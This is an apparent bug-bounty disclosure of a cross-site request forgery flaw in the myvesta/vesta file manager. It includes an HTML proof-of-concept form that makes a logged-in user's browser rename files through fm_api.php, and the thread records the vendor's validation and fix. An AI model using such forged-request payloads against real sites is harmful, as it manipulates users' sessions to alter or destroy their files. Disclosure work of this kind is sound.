Cross-Site Request Forgery (CSRF) in myvesta/vesta

Valid

Reported on

Aug 24th 2021

✍️ Description

Attacker is able to rename any file on the server if logged in user visits attacker website.

πŸ•΅οΈβ€β™‚οΈ Proof of Concept

Create a test.txt file under /home/user when you logged in open this POC.html in a browser you can check test.txt renames to test.php.


//PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.myvesta.com/file_manager/fm_api.php">
<input type="hidden" name="item" value="test&#46;php" />
<input type="hidden" name="target&#95;name" value="test&#46;txt" />
<input type="hidden" name="dir" value="&#47;home&#47;user&#47;" />
<input type="hidden" name="action" value="rename&#95;file" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

πŸ’₯ Impact

This vulnerability is capable of forging admin or user to delete any file where user has access to it.

πŸ’₯ Test

Tested on Edge, firefox, chrome and safari. πŸ“ Location fm_api.php#L1 πŸ“ References csrf

Occurrences

References

We have contacted a member of the myvesta/vesta team and are waiting to hear back 2 years ago
Musio modified the report
2 years ago
myvesta validated this vulnerability 2 years ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
myvesta marked this as fixed with commit 93de22 2 years ago
myvesta has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation